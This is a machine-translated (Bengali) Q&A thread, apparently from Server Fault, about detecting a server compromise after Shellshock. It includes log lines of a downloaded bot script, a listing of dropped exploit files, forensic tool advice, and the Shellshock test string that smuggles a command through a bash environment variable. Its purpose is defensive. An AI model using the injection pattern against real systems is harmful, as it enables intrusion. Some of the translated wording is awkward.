[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] 100%
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]   575K
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] =0.03s
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] 2014-09-28 01:29:34 (575 KB/s) - `/tmp/bot.pl' saved [17079/17079]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] script not found or unable to stat: /srv/www/vhosts/default/cgi-binphp5
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] script not found or unable to stat: /srv/www/vhosts/default/cgi-binphp5-cli
[Sun Sep 28 01:34:34 2014] [warn] [client 94.102.63.238] Timeout waiting for output from CGI script /srv/www/cgi-bin/cgi_wrapper/cgi_wrapper
[Sun Sep 28 01:34:34 2014] [error] [client 94.102.63.238] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed

ফাইলগুলি / টিএমপি-তে ডাউনলোড হয়েছে যেমন অনুমান করা যায়, আমার সাথে বট.পিএল ফাইল নেই কারণ এটি এখনই মুছে ফেলা হয়েছে।

-rwxr-xr-x 1 user100  psacln   187 Sep 29 01:02 check
-rwxr-xr-x 1 user100  psacln  9849 Sep 29 03:35 exploit
drwxr-xr-x 4 user100  psacln  4096 Sep 29 03:19 expls
-rw-r--r-- 1 user100  psacln 91693 Sep 29 03:13 expls.tgz
-rw-r--r-- 1 user100  psacln   178 Sep 29 03:35 payload.c

cd ./expls
drwxr-xr-x 2 user100  psacln  4096 Sep 29 03:13 1
drwxr-xr-x 2 user100  psacln  4096 Sep 29 03:13 2
-rwxr-xr-x 1 user100  psacln 23040 Sep 29 03:19 bcm
-rw-r--r-- 1 user100  psacln 15695 Sep 29 02:46 bcm.c
-rwxr-xr-x 1 user100  psacln 13175 Sep 29 03:19 bug
-rw-r--r-- 1 user100  psacln  2657 Sep 29 02:46 bug.c
-rwxr-xr-x 1 user100  psacln 14560 Sep 29 03:13 config
-rw-r--r-- 1 user100  psacln  6468 Sep 29 02:46 config.c
-rwxr-xr-x 1 user100  psacln 13866 Sep 29 03:13 config2
-rw-r--r-- 1 user100  psacln  6335 Sep 29 02:46 config2.c
-rw-r--r-- 1 user100  psacln  2736 Sep 29 02:46 data.c
-rw-r--r-- 1 user100  psacln  4221 Sep 29 02:46 diag.c
-rwxr-xr-x 1 user100  psacln 13698 Sep 29 03:19 expl
-rw-r--r-- 1 user100  psacln  1686 Sep 29 02:46 expl.c
-rw-r--r-- 1 user100  psacln 15013 Sep 29 02:46 half.c
-rwxr-xr-x 1 user100  psacln 18611 Sep 29 03:19 nellson
-rw-r--r-- 1 user100  psacln  9489 Sep 29 02:46 nellson.c
-rwxr-xr-x 1 user100  psacln   419 Sep 29 02:03 origin
-rw-r--r-- 1 user100  psacln 15727 Sep 29 02:46 pipe.c
-rwxr-xr-x 1 user100  psacln 13481 Sep 29 03:19 polkit
-rw-r--r-- 1 user100  psacln  3597 Sep 29 02:46 polkit.c
-rwxr-xr-x 1 user100  psacln  2741 Sep 29 01:51 preload
-rwxr-xr-x 1 user100  psacln   208 Sep 29 02:01 preload2
-rwxr-xr-x 1 user100  psacln 14257 Sep 29 03:13 rds
-rw-r--r-- 1 user100  psacln  7250 Sep 29 02:46 rds.c
-rwxr-xr-x 1 user100  psacln   233 Sep 29 03:13 run
-rwxr-xr-x 1 user100  psacln 17864 Sep 29 03:19 semtex
-rw-r--r-- 1 user100  psacln  3757 Sep 29 02:46 semtex.c
-rwxr-xr-x 1 user100  psacln 14023 Sep 29 03:13 semtex2
-rw-r--r-- 1 user100  psacln  4799 Sep 29 02:46 semtex2.c
-rwxr-xr-x 1 user100  psacln 17904 Sep 29 03:19 semtex3
-rw-r--r-- 1 user100  psacln  2691 Sep 29 02:46 semtex3.c
-rwxr-xr-x 1 user100  psacln 13014 Sep 29 03:19 shell
-rw-r--r-- 1 user100  psacln   159 Sep 29 02:46 shell.c
-rwxr-xr-x 1 user100  psacln  9157 Sep 29 03:13 sock
-rw-r--r-- 1 user100  psacln  2232 Sep 29 02:46 sock.c
-rwxr-xr-x 1 user100  psacln   438 Sep 29 03:13 start
-rwxr-xr-x 1 user100  psacln 18268 Sep 29 03:19 sys32
-rw-r--r-- 1 user100  psacln  5389 Sep 29 02:46 sys32.c
-rw-r--r-- 1 user100  psacln 25396 Sep 29 02:46 x86_64.c

কিছুক্ষণ পরে আমি লক্ষ্য করেছি যে চীনের মতো বিভিন্ন জায়গা থেকে এসএসএস সংযোগ রয়েছে যা সাধারণত আমাদের সার্ভারটি তেমন পরিদর্শন করে না। আমি জরুরী ব্যবস্থা হিসাবে বাশকে প্যাচ করেছিলাম (এফএসএফ ওয়েবসাইট থেকে প্যাচ করা উত্সগুলি পাওয়া ভাল ছিলো এবং কেবলমাত্র সত্যিকারের ওল্ড উত্স এবং প্যাচ-ফাইলই নয় (যার মধ্যে একটি প্রথমে সঠিকভাবে প্রয়োগ হয় নি) সিস্টেমটি একটি সম্পূর্ণ নির্ধারিত হয়েছে এখনই মুছুন, সুতরাং কেউ যদি আক্রমণ সম্পর্কে অন্য কিছু খুঁজছেন, আপনি জিজ্ঞাসা করতে পারেন, তবে শীঘ্রই এটি করুন।

ফ্র্যাঙ্ক ওয়ালার
সূত্র
3

এই উত্তরটি শেলশকের সাথে বিশেষত সম্পর্কিত নয় তবে যে কোনও সিস্টেমের জন্য আপনি আপোস করতে পারেন বলে মনে করতে পারেন

দ্বিতীয় নোট: আপনি কোনও রুট সিস্টেমে আপোস করা থেকে পুনরুদ্ধার করা নিশ্চিত হতে পারবেন না। আপনার একমাত্র ক্রিয়াটি হ'ল সিস্টেমটি ধ্বংস এবং পুনঃব্যবস্থাপনা

একটি পরিচ্ছন্ন স্ট্যাটিক বিল্ড পেতে চেষ্টা করুন rpmএবং চালানোর কমান্ড rpm --verify --all। এটি আপনাকে জানাবে যে কোনও প্যাকেজের অন্তর্ভুক্ত কোন ফাইলগুলি সংশোধন করা হয়েছে। তবে যেহেতু আপনি এটি একটি আপোসড সিস্টেমে চালাতে পারেন তাই আপনি ফলাফলটি পুরোপুরি বিশ্বাস করতে পারেন না। তারপরে আপনি rpm -qaপ্যাকেজগুলির তালিকা পেতে, একই প্যাকেজ সংস্করণ সহ অন্য একটি সিস্টেম পুনরায় তৈরি করতে পারেন এবং তারপরে find / -type f |xargs -r -n 100 md5sum |sortউভয় সিস্টেমে একটি পরীক্ষা করতে পারেন এবং দেখতে দেখতে কী আলাদা হয়। এছাড়াও যদি আপনি আপনার সিস্টেমটি সঠিকভাবে পরিচালনা করেন (যার অর্থ / অপ্ট বা / ইউএসআর / স্থানীয় / বিন বা অন্য কোনও ব্যবস্থাবিহীন জায়গার বাইরে ম্যানুয়ালি কোনও কিছু ইনস্টল না করা), আপনি আপনার সিস্টেমে এমন সমস্ত ফাইল সন্ধান করতে পারেন যা প্যাকেজের সাথে সম্পর্কিত নয় find / -type f -exec rpm -qf {} \;। এটি অজানা ফাইলগুলির জন্য ত্রুটিগুলি দেখানো উচিত। আমি আপনাকে অনুশীলন হিসাবে ধনাত্মকতাগুলি প্রদর্শন করতে দিচ্ছি না ;-)

ক্রিপ্টোগ্রাফিক প্রুফ দিয়ে পর্যায়ক্রমে একই কাজ করার জন্য, এমন একটি সরঞ্জাম রয়েছে যার নাম Tripwireআপনি এখনও নিখরচায় সংস্করণ হিসাবে পেতে পারেন। এটি পুরানো তবে এটি কাজ করে। একটি নতুন বিকল্পটি হ'ল AIDE, কিন্তু বছরখানেক আগে যখন আমি এটি দেখছিলাম তখন এটি ক্রিপ্টো ব্যবহার করছিল না।

কিছু সরঞ্জাম রয়েছে যা সাহায্য করতে পারে। উদাহরণস্বরূপ প্যাকেজ জন্য দেখুন rkhunter। এটি আপনার কম্পিউটারকে জ্ঞাত রুট টুলকিট, এবং শোষিত ফাইলগুলির জন্য স্ক্যান করবে।

স্পষ্টতই এই সরঞ্জামগুলি সিস্টেমের সাথে আপোস হওয়ার আগে ইনস্টল এবং কনফিগার করা উচিত ছিল এবং আপনার সিস্টেমটি রুট অ্যাক্সেসে সফলভাবে হ্যাক করা থাকলে এই সরঞ্জামগুলিও লক্ষ্যবস্তু হতে পারে। তদতিরিক্ত, এই সরঞ্জামগুলি খুব নিবিড় এবং আপনার সিস্টেমকে ধীর করতে পারে।

অ্যালেক্স এফ
সূত্র
2

আপনার সার্ভারের সাথে আপোস করা হয়েছে কিনা তা জানার একমাত্র উপায় হ'ল কোথাও আপনার ফাইলগুলির স্বাক্ষর থাকা এবং আপনার বর্তমান ফাইলগুলি এর সাথে তুলনা করা। তবুও আপনি দেখতে পান যে আপনি দুর্বল কিনা।

  1. আপনি পারবেন না আপনার মেশিনটি আসলেই আপোস করা হয়েছে তা ধরে নেওয়া যুক্তিযুক্ত, আপনার সাধারণ মনিটরিং সরঞ্জামগুলি (পিএস, শীর্ষ, এলএসফ, ...) একই ধরণের সরঞ্জামগুলির সাথে প্রতিস্থাপন করা হয়েছে যার আউটপুট স্বাভাবিক দেখায়, সন্দেহজনক কার্যকলাপ লুকিয়ে রাখছে
  2. কোন। এক্সিকিউটেবল ফাইল সহ যে কোনও ফোল্ডারে থাকতে পারে।
  3. সাধারণ মনিটরিং সরঞ্জাম সহ যে কোনও এক্সিকিউটেবল ফাইল বা স্ক্রিপ্ট (ইএলএফ বাইনারি, .শেল স্ক্রিপ্ট, ...)
মনু এইচ
সূত্র
-3

আপনার লিনাক্স বাক্সে আপোস করা হয়েছে কিনা তা কীভাবে খুঁজে পাবেন।

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

যদি ফিরে আসে

vulnerable
this is a test

তুমি.

আপডেটটি চালাতে, রুটের নীচে নিম্নলিখিত কমান্ডটি চালান

sudo yum update bash
PJunior
সূত্র
16
-1 বাশটি দুর্বল কিনা তা এই পরীক্ষা করে দেখুন, এটির সাথে আসলে আপস করা হয়েছে কিনা।
ক্যালিমো
1
এটি ধরে নিয়েছে যে আপনি চলছে yumএবং অন্য প্যাকেজ ম্যানেজার নয়।
ডেভিডজি
-3

আপনি নিম্নলিখিত কমান্ডগুলি (সিএসএ দ্বারা প্রদত্ত কোড) চালিয়ে আপনি দুর্বল কিনা তা পরীক্ষা করতে পারেন। একটি টার্মিনাল উইন্ডো খুলুন এবং $ প্রম্পটে নিম্নলিখিত কমান্ডটি প্রবেশ করুন:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

আপনার বাশ যদি আপ টু ডেট না থাকে তবে এটি মুদ্রণ করবে:

vulnerable
this is a test

আপনার বাশ যদি আপ টু ডেট থাকে তবে আপনি কেবল দেখতে পাবেন:

this is a test

আরও বিস্তারিত এই লিঙ্কের পিছনে উপলব্ধ ।

মনু সোমরাজ
সূত্র
1
প্রশ্নটি সনাক্ত করার বিষয়ে ছিল যে কোনও সার্ভার আপোস করা হয়েছিল , এটি যে দুর্বল
গ্যারেথ
দয়া করে অন্য প্রতিক্রিয়াগুলি পড়ার আগে এমন একটি প্রতিক্রিয়ার মতো পোস্ট করার আগে বিবেচনা করুন যার স্কোর কম কারণ এটি প্রশ্নের উত্তর দেয় না।
মানু এইচ
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.